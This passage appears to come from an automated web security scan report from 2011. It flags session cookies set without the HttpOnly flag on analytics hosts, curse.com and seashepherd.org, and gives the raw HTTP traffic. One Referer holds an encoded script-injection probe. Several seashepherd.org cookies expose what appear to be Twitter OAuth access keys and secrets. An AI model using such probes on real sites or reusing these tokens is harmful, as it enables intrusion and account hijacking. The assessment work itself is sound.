GET /ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719dfbec80906eeaf8e6b329ad1c66a04d5dcf192e3cde61c254f6c88534da58802b5398ea24b9efa9ba685dfd72bea4fa8190c69ae5ede6f0721ccb34e717c6107bcfaf2cfe44f88fec42e36ffe9116f59a6f918a80dd8e17e504876f2e69c508c691b6d9281fff0acd3e99db7f9b07ac79b36cd607e06da5e9c4458d76d0eeac1f394a802d460f590fe6ea7f666d23dccd20abac2d92880ff34a405027857b7f2db653389d23a43638d06e3f765a2d8d598f1062f8fcd643983437aeac41c62611881d352de9d97c32cf54f777d612b929d8913b5bc8b0379af246e1bba7d1821ce8b1b8db8d166b7f52081b0a29d9119cb9a4f447873339c33193f96e2f108ab154593263be7f6518d1944fa3b1b1cec003d123452e5333cec0b0f3c0ae168e5d0e9db1a53bf3e808baf3f24e64c14c3f2b1e02cee7dfd5cb0cdcc45ad329b17c70e526b36a57e0b3bf603170be9a33aafff9eca4a1237a8ffe472485706d9f6c895e32c048508fbc64699631b195653c891687399cd539d3d95b6bf7900cb355e8251411b31212492b4091796c5e2d549c235a07490aa42afdae8548a987faccef67a1445162cd38c7499b47ab78ad924ef99525bd815e63ce7e885fe39ca6822ceb3602d0059b0a8f279e80766642b31203aa6d6ee97b9139867ee1aa7ba3f02f41253bf90b753118e080e6a038d7c0b2be2dc588716e7c6fc4e44d4d21802c75c1e8806abefaa114127472ef49590b2b5d5d52a87d622d582fb317c59bf26d4866e09d8a6c7a747582d807bb41131bf80bb4a8a24de4bc3ee7f8eef25e09fc0178bbc46a0a277ef134dbcf1ca97ea6ca96afc78a753694fe0857a6a3e32243f4ef6cc09f2332399d9d6b530b1b82b7bd324435314e635aa5253c38beeb1db2ad850da9fc12d1499010dbb2637e44e058368dcd0c776032f802db4acabefd54c5dee0ba16f60e6a6b2c1ace90fa07cc47b900c5174eceb36fd04d48af115d89be05c6c3e551e620b3a5ade8a9ad503d1f87ea9eae460023c247a3bd2c7432c3944c4d2fe440c587c86375db1c89060973f59d04e9789b6e43a04d4773063e59072ff7d9b9e033c5eb1ba6c5622ab57a7359c1c627019c9cdb4253bf4d2c877529f44ffe96a4e6079d1755855503fb07d4e2f4b2ff8b6dfd9c2bf3df203913969704acae50f9dabbce015db5f187ccaf1e838551259e3d016f9d10ca3f62e1ac73921d7d7f7668c16055fbd964d70510d824bc6a4fc13ede16c8529b3519e560528905a6c698a589515bca2c3dd41390cd58e004bfcb88af5a73e26245b6d033bd9b438c391c763b212a7a30ea79b75490603bcd1af2342fb0e53c16725ac86b99104b7858efe72acb55e7faa22a53e4b676f15b9f3c5097bfaedfeae70071cde9d9213790950c684e4e03df0e2a17e4551cfde0e5517f19b1fc0e374c6183a508779a0763e68b8d5b62c6855cd1e9ce1ab1f80919279c7f38496119233d88d1a3dbc24e85d3d838d5783d2566d68a0051f463b6f4bfdd3331d06c8b6a5d51c76f15a5d21443dbd0c6670c7bdaa3be0a104bbf57876dba9c5c928ddf236591ef12aa7c129be5265b8cd9ca3383564f530c9dc8734195e13e473e5477f80fae3f4f889c7a853856a70bf995a8208e85de0f4cf1d9dccbaa929d2fcbc646e010a6083c1be46d0eb909292c053b14b8795919ce8dc3067b1bb3d7345cb89da2f89fef0a17b13309a9ef385b98035afeb4a79786d398dba2f4f8e65081d313780362dd1cd7eef7b4646eaea4084d0667e77d299cb65a1b72184547c481603bc57d1 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx?bladeFlyout=LocalePicker&SearchType=0&navIndex=2&hdrFo=mthdr02
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=10D213871EB701B33BE9A6992DF90D28

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 15:41:37 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=BF7780E003CE01313D85D5C6CF53E033; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 6131
Connection: Keep-Alive

/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.1 2009-11-24 23:15:52 michae
...[SNIP]...

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41ace38de70fd1d0bd08fcf372b5762404eb44e72200079ef5c91708f9a5ae736596cbdf675b99a2f886bec6a144744639c5121396c44ffe2bc2b3439debd6b39cdecc3ab105a609097cf452c6200f2be9be4377667b13ccbae2cdfa43a8e3997766bbae273b5ab1ff469a5692a672421334b1f3ba5183650623829decb693d6b682e0afe92d849a36d77c696f9b02f52213c7753c022c538b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=ED1A2AF23E838F49A195506B6FC6AF8F; Path=/ots

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 20:36:00 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=ED1A2AF23E838F49A195506B6FC6AF8F; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 5953
Connection: Keep-Alive

/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.1 2009-11-24 23:15:52 michae
...[SNIP]...

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41ace38de70fd1d0bd08fcf372b5762404eb44e72200079ef5c91708f9a5ae736596cbdf675b99a2f886bec6a144744639c5121396c44ffe2bc2b3439debd6b39cdecc3ab105a609097cf452c6200f2be9be4377667b13ccbae2cdfa43a8e3997766bbae273b5ab1ff469a5692a672421334b1f3ba5183650623829decb693d6b782e0af9f4bfcef26c36e0336dd479c6658e55070b5e4b7bde575cc77e590f867a08763d726c3f654ef95915adab36bfc3316044cd6a98a351cdbc765154dd94cf8f96bd3f0e1a3d64c41d4f8322d882278fbdb09384558fc8f7582dc8dbd36862f1a683879d69ad104caddc45b33a22e2e65f1675c77ef961b91a2d167b7f57993dfcd8fec5580d8231a393458d620142e94f6f269a51b2aa34877aff62cfa6133e8200a75b3497c79770b83465fb0385d11479666fda58cb46d32ac54e7e9a04334e25d15d5a9f7a264df2eda17fe91dc4ecc20e963d77951256af5214019cd6f611bf6b23eb9fb9dbd561721adf984763f4077d2bc84b0af0863f60defc331fd636c7927438ad26c6eccb308df66a0d1ff243efc1c698559510e214e23fff01516a58fa093338256ef38c5ea138596a112dcf552fbdefe2c4c1b436894db29d0a47cb09fd3488ccf12068f54fd24f588e29247b90d39b9d40132105bfee5a360f21b757e3a35367cfcc6f186dd15e972e41ee4e67941aa4e0eaa87b73507fd1f492b52d1234a3ce2cb4ff772f0c6bd0b16908f0b05cc4d1dfe10af9dba1043711677a48995b7a7d4a23a82dd4ea3fc9b260d4ea826e1c6325fc2a6c2e650583a9609804e70e8a5f716dd338e0bf6ae34cfbe7ebfdf8022cfe474f0fe21af4665e3a79e8ae91db569886db8420c19b2b30c2c1c63732f18b5ed18ef28279ec4ddb637afa8431bc274021742b572a14459d6f4b2e6ab6bfe07ca81960925b4263fcc363fe34c668a7883928025527d972ea2aea9ee854450bf5dbb737684cdd0bfdff903b77bdf72807f567c8d872286509dc6c75890d0b6496e3c401d1b0c2d45ab809ad65f96ba39fdb3a07f033a3b7a4a8bc0316967129582a418440a76875c4ab6bd836c845d108009fecceeb27304b13a1272ce9369ce22c1ae722745a9ae1e0d72ed09f77e9d7b1d1778919ed76173b2b2d76d12d473afb223296c6aa0782f732a41e55e5f21455ac780dfbfdaa74baa54913b096350a2a2538da9bce11ccd5c0770d0f1e32750022f9fa403efc055eaa17044cf2b5dc5c9e13fd24a4120d6805860500f835dc7a2f217ebee6d8f3fc044f00e1603fa4f3555e30ff220bbc4a3ac566017df870717fbc4f692a62b5f5b2f12782aa5ca41a897a702d618dfd102d095794e620edbafe46c12f90e58c93131cda5f4d64fbda184b517cada3714df33af2a363f3856e5b59a5c3b8b99bdfc722c40d2c3b52d6e5c14daf9868257d58bda654d169283155b199ebb7094b7239f0f6613d37ba427343eb1d3b62c6f04c10e99b3e8129391e77c83be93f727fa5ff3a245056473e3

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=B0AC1E448F20F08C78B7A5BC5954F9D4; Path=/ots

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41ace38de70fd1d0bd08fcf372b5762404eb44e72200079ef5c91708f9a5ae736596cbdf675b99a2f886bec6a144744639c5121396c44ffe2bc2b3439debd6b39cdecc3ab105a609097cf452c6200f2be9be4377667b13ccbae2cdfa43a8e3997766bbae273b5ab1ff469a5692a672421334b1f3ba5183650623829decb693d6b782e0af9f4bfcef26c36e0336dd479c6658e55070b5e4b7bde575cc77e590f867a08763d726c3f654ef95915adab36bfc3316044cd6a98a351cdbc765154dd94cf8f96bd3f0e1a3d64c41d4f8322d882278fbdb09384558fc8f7582dc8dbd36862f1a683879d69ad104caddc45b33a22e2e65f1675c77ef961b91a2d167b7f57993dfcd8fec5580d8231a393458d620142e94f6f269a51b2aa34877aff62cfa6133e8200a75b3497c79770b83465fb0385d11479666fda58cb46d32ac54e7e9a04334e25d15d5a9f7a264df2eda17fe91dc4ecc20e963d77951256af5214019cd6f611bf6b23eb9fb9dbd561721adf984763f4077d2bc84b0af0863f60defc331fd636c7927438ad26c6eccb308df66a0d1ff243efc1c698559510e214e23fff01516a58fa093338256ef38c5ea138596a112dcf552fbdefe2c4c1b436894db29d0a47cb09fd3488ccf12068f54fd24f588e29247b90d39b9d40132105bfee5a360f21b757e3a35367cfcc6f186dd15e972e41ee4e67941aa4e0eaa87b73507fd1f492b52d1234a3ce2cb4ff772f0c6bd0b16908f0b05cc4d1dfe10af9dba1043711677a48995b7a7d4a23a82dd4ea3fc9b260d4ea826e1c6325fc2a6c2e650583a9609804e70e8a5f716dd338e0bf6ae34cfbe7ebfdf8022cfe474f0fe21af4665e3a79e8ae91db569886db8420c19b2b30c2c1c63732f18b5ed18ef28279ec4ddb637afa8431bc274021742b572a14459d6f4b2e6ab6bfe07ca81960925b4263fcc363fe34c668a7883928025527d972ea2aea9ee854450bf5dbb737684cdd0bfdff903b77bdf72807f567c8d872286509dc6c75890d0b6496e3c401d1b0c2d45ab809ad65f96ba39fdb3a07f033a3b7a4a8bc0316967129582a418440a76875c4ab6bd836c845d108009fecceeb27304b13a1272ce9369ce22c1ae722745a9ae1e0d72ed09f77e9d7b1d1778919ed76173b2b2d76d12d473afb223296c6aa0782f732a41e55e5f21455ac780dfbfdaa74baa54913b096350a2a2538da9bce11ccd5c0770d0f1e32750022f9fa403efc055eaa17044cf2b5dc5c9e13fd24a4120d6805860500f835dc7a2f217ebee6d8f3fc044f00e1603fa4f3555e30ff220bbc4a3ac566017df870717fbc4f692a62b5f5b2f12782aa5ca41a897a702d618dfd102d095794e620edbafe46c12f90e58c93131cda5f4d64fbda184b517cada3714df33af2a363f3856e5b59a5c3b8b99bdfc722c40d2c3b52d6e5c14daf9868257d58bda654d169283155b199ebb7094b7239f0f6613d37ba427343eb1d3b62c6f04c10e99b3e8129391e77c83be93f727fa5ff3a245056473e3 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-us/security_essentials/default.aspx?bladeFlyout=Share&f9857%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3E256ae1bee6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 20:35:27 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=B0AC1E448F20F08C78B7A5BC5954F9D4; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 5953
Connection: Keep-Alive

/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.1 2009-11-24 23:15:52 michae
...[SNIP]...

11.28. http://pixel.everesttech.net/2368/gr previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://pixel.everesttech.net
Path:	/2368/gr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

everest_session_v2=EsNOKHzlCnwAAAt2; path=/; domain=.everesttech.net
everest_g_v2=g_surferid~er9OKHxYa3AAAMko; path=/; domain=.everesttech.net; expires=Fri, 26-Jul-2030 06:09:51 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.29. http://pixel1350.everesttech.net/1350/p previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://pixel1350.everesttech.net
Path:	/1350/p

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

everest_session_v2=er9OKHxYa3AAAMko; path=/; domain=.everesttech.net
everest_g_v2=g_surferid~er9OKHxYa3AAAMko; path=/; domain=.everesttech.net; expires=Fri, 26-Jul-2030 06:02:01 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.30. http://t.mookie1.com/t/v1/imp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://t.mookie1.com
Path:	/t/v1/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=1311271309|1311271310; path=/; domain=.mookie1.com
id=4612530447660445644; path=/; expires=Tue, 14-Aug-12 18:01:50 GMT; domain=.mookie1.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.31. http://wow.curse.com/user/NetworkCookie/ajaxSession.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://wow.curse.com
Path:	/user/NetworkCookie/ajaxSession.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Network.Session=IFKPILULOMJYRMJS; domain=.curse.com; expires=Tue, 20-Jul-2021 04:49:00 GMT; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
CommunityServer: 4.0.30619.63
Set-Cookie: Network.Session=IFKPILULOMJYRMJS; domain=.curse.com; expires=Tue, 20-Jul-2021 04:49:00 GMT; path=/
Set-Cookie: Network.Lock=1; domain=.curse.com; path=/
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:49:00 GMT
Content-Length: 83

<html><body><script>parent.Curse.Session.handleLogin(false);</script></body></html>

11.32. http://www.pages05.net/WTS/event.jpeg previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.pages05.net
Path:	/WTS/event.jpeg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=92DE9F4CFD6B627ED7B836565876686E; Path=/
BIGipServerP5-LPAGES-RECP-8005=202340362.17695.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /WTS/event.jpeg?accesskey=1a8b3ca-1267bb7dbd6-c6f842ded9e6d11c5ffebd715e129037&v=1.07&isNewSession=1&type=pageview&isNewVisitor=1&sessionGUID=dddb42e7-87ce-d4b8-d8b8-7704ab61150d&webSyncID=e499589c-52e7-b36a-7d8b-52b46b70da48&url=about%3Ablank&newSiteVisit=1&pathname=%2Fblank&pagename=%2Fblank&newPageVisit=1&requestGuid=99c27d89-2b1e-6bc0-519a-749c3d73b011 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.pages05.net

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:57:07 GMT
Server: Apache
Set-Cookie: JSESSIONID=92DE9F4CFD6B627ED7B836565876686E; Path=/
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, s-maxage=0
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 0
Connection: close
Content-Type: image/jpeg
Set-Cookie: BIGipServerP5-LPAGES-RECP-8005=202340362.17695.0000; path=/

11.33. http://www.seashepherd.org/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.seashepherd.org
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2269b50aaf8bae756f1b403cf113b52a3f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1311426899%3Bs%3A20%3A%22twitter_oauth_tokens%22%3Ba%3A2%3A%7Bs%3A10%3A%22access_key%22%3Bs%3A50%3A%2217156000-5bcpafY2GPkwanVv03jLVXKS0AcBJ0Uo4HqaHsTZs%22%3Bs%3A13%3A%22access_secret%22%3Bs%3A41%3A%22ThctelECOSi7nC1iRfLr6fkveN0ahhSKhmp1eWBiY%22%3B%7D%7D906ea39ef1d54c5e3ca86c5d6ceaa14d; expires=Sat, 23-Jul-2011 15:17:13 GMT; path=/
ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2269b50aaf8bae756f1b403cf113b52a3f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1311426899%3Bs%3A20%3A%22twitter_oauth_tokens%22%3Ba%3A2%3A%7Bs%3A10%3A%22access_key%22%3Bs%3A50%3A%2217156000-5bcpafY2GPkwanVv03jLVXKS0AcBJ0Uo4HqaHsTZs%22%3Bs%3A13%3A%22access_secret%22%3Bs%3A41%3A%22ThctelECOSi7nC1iRfLr6fkveN0ahhSKhmp1eWBiY%22%3B%7D%7D906ea39ef1d54c5e3ca86c5d6ceaa14d; expires=Sat, 23-Jul-2011 15:17:13 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.seashepherd.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.seashepherd.org/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2269b50aaf8bae756f1b403cf113b52a3f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1311426899%3Bs%3A20%3A%22twitter_oauth_tokens%22%3Ba%3A2%3A%7Bs%3A10%3A%22access_key%22%3Bs%3A50%3A%2217156000-5bcpafY2GPkwanVv03jLVXKS0AcBJ0Uo4HqaHsTZs%22%3Bs%3A13%3A%22access_secret%22%3Bs%3A41%3A%22ThctelECOSi7nC1iRfLr6fkveN0ahhSKhmp1eWBiY%22%3B%7D%7D906ea39ef1d54c5e3ca86c5d6ceaa14d; __utma=208012304.1819747705.1311426916.1311426916.1311426916.1; __utmb=208012304.1.10.1311426916; __utmc=208012304; __utmz=208012304.1311426916.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:17:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2269b50aaf8bae756f1b403cf113b52a3f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1311426899%3Bs%3A20%3A%22twitter_oauth_tokens%22%3Ba%3A2%3A%7Bs%3A10%3A%22access_key%22%3Bs%3A50%3A%2217156000-5bcpafY2GPkwanVv03jLVXKS0AcBJ0Uo4HqaHsTZs%22%3Bs%3A13%3A%22access_secret%22%3Bs%3A41%3A%22ThctelECOSi7nC1iRfLr6fkveN0ahhSKhmp1eWBiY%22%3B%7D%7D906ea39ef1d54c5e3ca86c5d6ceaa14d; expires=Sat, 23-Jul-2011 15:17:13 GMT; path=/
Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2269b50aaf8bae756f1b403cf113b52a3f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%3B+rv%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1311426899%3Bs%3A20%3A%22twitter_oauth_tokens%22%3Ba%3A2%3A%7Bs%3A10%3A%22access_key%22%3Bs%3A50%3A%2217156000-5bcpafY2GPkwanVv03jLVXKS0AcBJ0Uo4HqaHsTZs%22%3Bs%3A13%3A%22access_secret%22%3Bs%3A41%3A%22ThctelECOSi7nC1iRfLr6fkveN0ahhSKhmp1eWBiY%22%3B%7D%7D906ea39ef1d54c5e3ca86c5d6ceaa14d; expires=Sat, 23-Jul-2011 15:17:13 GMT; path=/
X-Powered-By: PleskLin
Content-Type: text/html
Content-Length: 59923

<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="utf-8">
   <meta name="robots" content="index, follow" />
               <title>Sea Shepherd</title>
   <link href="/media/css/base.css" type="text/css" rel="s
...[SNIP]...

11.34. http://www.seashepherd.org/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.seashepherd.org
Path:	/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2244faedc66a39c1cd79431d85e71d4605%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1311426907%3B%7D3702409268ba35be0558c532b9e1e58b; expires=Sat, 23-Jul-2011 15:15:07 GMT; path=/
ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2244faedc66a39c1cd79431d85e71d4605%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1311426907%3Bs%3A20%3A%22twitter_oauth_tokens%22%3Ba%3A1%3A%7Bs%3A10%3A%22access_key%22%3Bs%3A50%3A%2217156000-5bcpafY2GPkwanVv03jLVXKS0AcBJ0Uo4HqaHsTZs%22%3B%7D%7Db7d80dd75ac666f6707937027ace3c9e; expires=Sat, 23-Jul-2011 15:15:07 GMT; path=/
ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2244faedc66a39c1cd79431d85e71d4605%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1311426907%3Bs%3A20%3A%22twitter_oauth_tokens%22%3Ba%3A2%3A%7Bs%3A10%3A%22access_key%22%3Bs%3A50%3A%2217156000-5bcpafY2GPkwanVv03jLVXKS0AcBJ0Uo4HqaHsTZs%22%3Bs%3A13%3A%22access_secret%22%3Bs%3A41%3A%22ThctelECOSi7nC1iRfLr6fkveN0ahhSKhmp1eWBiY%22%3B%7D%7D0a6d283a0326461bdbd4f6ee1617d88c; expires=Sat, 23-Jul-2011 15:15:07 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263 HTTP/1.1
Host: www.seashepherd.org
Proxy-Connection: keep-alive
